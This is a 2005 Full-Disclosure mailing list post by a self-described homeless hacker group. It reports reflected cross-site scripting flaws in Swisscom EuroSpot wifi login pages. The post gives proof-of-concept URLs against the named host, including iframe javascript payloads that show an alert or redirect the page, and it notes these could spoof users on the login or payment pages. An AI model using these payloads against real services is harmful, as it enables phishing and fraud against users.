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[Full-disclosure] HHU #1: "It's secure, it's reliable, it's Swiss"

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    \  \:\        \  \:\        \  \::/
     \__\/         \__\/         \__\/

"It's secure, it's reliable, it's Swiss"

Homeless Hackers United is a small group of homeless hackers from Europe and
North America. We can't afford paying for Internet access or hotel rooms.
Our only crime is to have a laptop and wireless card, and few knowledge.
Homeless state give us the freedom to access and use various open systems,
accessible from public places. The following has been tested in UK, Germany, France
and Norway.

Swisscom EuroSpot is a wireless service offered in airports, hotels and
other public places. Customers buy certain amount of time online and get access
to the wireless network. The login page is of course open in order to join and
subscribe to the service.
HHU has been able to access, and validate around several hotels and public


XSS, URL evasion

Swisscom access point seems to use radius servers to provide internet access to
their customers. We also noticed issues on the radius authentification process
that may be published later. After joining the network you will have either to
buy access time or login. The following has been tested in UK, Germany, France
and Norway.

http://login**.swisscom-eurospot.com/error.php? error=nasunknown_ui&UI=XSS
http://login**.swisscom-eurospot.com/login.php? LANG=de&UserID=0&RadiusReply=XSS

Proof of Concept
http://login02.swisscom-eurospot.com/error.php? error=nasunknown_ui&UI=Please%20fix%20this%20site
http://login02.swisscom-eurospot.com/error.php?error=nasunknown_ui&UI= %3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
http://login02.swisscom-eurospot.com/error.php?error=nasunknown_ui&UI= %3CIFRAME%20SRC=javascript:window.parent.location.replace(%2527http:// google.com%2527)%3E%3C/IFRAME%3E

Change, spoof and fool end-users on login page or paiement page. With a bit on
imagination it can be worst.

Discovered: august  14th 2005
Disclosure: october 28th 2005
Service Provider: no

HHU Policy
HHU can't even afford food, and we're are not paid to debug softwares or systems
for free.
We discover, then publish what we find. Will route tcp/ip packets for food!
"Fool me once, shame on — shame on you. Fool me — you can't get fooled again."
— George W. Bush

HHU Credits ----------- deepquest for discovering and POC, Mescalito for more POC. original post http://deepquest.code511.com/blog/more.php?id=319_0_1_0_M

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/